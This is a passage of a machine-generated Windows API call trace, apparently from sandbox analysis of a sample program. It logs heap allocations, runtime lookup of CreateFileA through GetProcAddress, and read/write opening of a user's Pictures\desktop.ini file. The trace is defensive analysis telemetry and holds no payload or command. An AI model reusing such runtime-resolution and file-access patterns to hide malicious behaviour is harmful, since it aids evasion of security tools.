(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.442] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0039.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cd18 [0039.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cd18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.443] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0039.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0039.450] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0039.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cd18, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.451] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0039.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0039.451] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x33) returned 0x7c2080 [0039.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", cchWideChar=51, lpMultiByteStr=0x7c2080, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", lpUsedDefaultChar=0x0) returned 51 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.451] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.452] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=51, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x66) returned 0x7c10a8 [0039.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=51, lpWideCharStr=0x7c10a8, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 51 [0039.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0039.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0039.452] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.452] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.453] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.453] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0039.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0039.454] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0039.454] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.454] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.455] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.455] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0039.455] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0039.456] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0039.456] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0039.456] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 